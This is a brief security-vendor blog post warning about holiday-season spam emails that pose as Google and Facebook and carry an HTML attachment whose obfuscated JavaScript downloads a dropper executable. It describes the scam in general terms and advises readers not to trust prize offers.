Holiday season malware

Our spam traps started to receive a large amount of plain text email spams. The emails pretend to stem from “Google and Facebook” and use the sender address info@facebook.com. The attachment which is 810 bytes in size is an html document containing some obfuscated JavaScript.

Considering these mails a “deja-vu”, I was preparing to just close and ignore them, but the JavaScript looked interesting. After unescaping the code it downloads the executable file “Google.information.exe” which is detected as TR/Dropper.Gen by Avira anti-malware solutions.

I would like to point out again here that nothing in this world comes for free. Do not let yourself get fooled by such prizes – those are really weird, by the way, as Google Maps relies on GPS in the smartphone already, for example; and Google Chrome OS will be free anyways as soon as it gets released!

Sorin Mustaca
Data Security Expert